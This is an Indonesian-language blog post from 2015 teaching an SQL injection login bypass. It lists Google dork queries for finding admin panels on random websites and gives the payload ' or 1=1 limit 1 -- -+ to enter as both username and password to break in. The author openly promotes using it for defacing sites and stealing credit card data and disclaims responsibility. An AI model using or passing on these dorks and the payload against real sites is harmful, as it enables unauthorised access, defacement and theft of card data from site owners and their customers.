17 February 2015
Oke, kali ini saya mau share tutorial SQLi Bypass Login :D . Dengan
teknik ini, kita bisa login ke halaman admin suatu website tanpa perlu
memasukkan user dan password yang dibuat oleh admin. Udah lama sih
tutorial ini saya dapat :D . Baru sempet share aja . hehehe. Oke
langsung saja ke tutorialnya :) .
Google Dork :
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
Kembangin lagi dorknya ya :)
Langkah langkah :
Nah, kalo udah dapet salahsatu web nya, kita login dengan user dan password berikut :
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+
Jika vuln, pasti masuk halaman admin kok :)
Gampang sekali bukan ?
Cara ini sebenarnya banyak manfaatnya. Selain buat yang hobi deface sana sini, yang mau cari credit card pakai cara ini juga terbukti ampuh :D
Tapi inget, dosa tanggung sendiri. ;)
Sekian tutorial kali ini . Terimakasih :)
Source : haurgeulis-security.com
Subscribe to:
Post Comments (Atom)
0 comments